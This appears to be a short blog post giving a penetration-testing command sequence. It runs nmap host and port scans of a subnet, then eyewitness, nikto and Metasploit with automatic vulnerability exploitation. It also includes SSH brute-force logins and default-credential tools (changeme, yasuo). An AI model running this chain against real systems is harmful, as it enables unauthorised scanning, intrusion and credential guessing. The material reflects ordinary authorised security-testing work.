nmap -T4 -v -sn -n 10.10.10.0/24 | grep -B1 up | grep 'scan report' | awk '{print $5}' >
livehost.txt
nmap -n -vvvv -sT -p0-65535 -A -iL livehost.txt -oA nmap_scan
for i in 21 22 23 80 443 445;do cat
nmap_scan
.gnmap | grep " $i/open"|cut -d " " -f2 > $i.txt;done
eyewitness --headless -d output -x nmap.xml -t 8
cat 80.txt | nikto -h - -Display V -F htm -output niktoscan.html
root@kali:~/Tools/web-app/tellmeweb# ./tell-me-web.rb nmap_scan.gnmap
msf > workspace -a clientname
msf > workspace clientname
msf > db_import nmap_scan.xml
msf > db_import /root/Nessus/nessus_scan.nbe
msf > load pentest
msf > vuln_exploit
msf > resource auto_brute.rc
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > service -p 22 -u -R
msf auxiliary(ssh_login) > exploit -j -z
root@kali:~/Tools/bruteforce/changeme# ./changeme.py -x nmap_scan.xml
root@kali:~/Tools/web-app/yasuo# ./yasuo.rb -b all -f nmap_scan.xml
Tidak ada komentar:
Posting Komentar